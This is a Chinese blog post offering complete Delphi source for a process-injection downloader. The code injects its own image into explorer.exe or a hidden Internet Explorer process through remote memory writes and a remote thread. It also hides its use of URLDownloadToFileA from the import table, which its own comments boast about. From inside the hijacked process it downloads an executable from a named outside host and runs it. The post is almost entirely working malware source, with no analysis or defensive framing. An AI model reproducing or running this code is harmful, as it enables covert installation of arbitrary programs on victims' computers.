该博客展示了一段代码,通过动态加载shell32.dll和Urlmon.dll中的函数,实现文件下载和程序执行。同时,代码还具备向explorer.exe或iexplore.exe进程注入的功能,包括内存分配、数据写入和远程线程创建等操作。
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows;
{$L 'SRT.obj'}
var
//动态加载shell32.dll中的ShellExecuteA函数~嘿嘿懒得加载ShellAPI单元了~又减小一点空间~
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数~还有个好处就四IAT中看不见这个函数名称~哈哈~
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := 'C:/Program Files/Internet Explorer/IEXPLORE.EXE';
RegCloseKey(iekey);
end;
procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('urlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://aryuan.51.net/test.exe','C:/test.exe', 0, nil);
ShellRun(0,'open','C:/test.exe',nil,nil,5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
StartupInfo: TStartupInfo;
ProcessInfo: TProcessInformation;
begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
begin
RunInject(1); //1 注入iexplore.exe 0 注入explorer.exe
end.
扫一扫
466
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
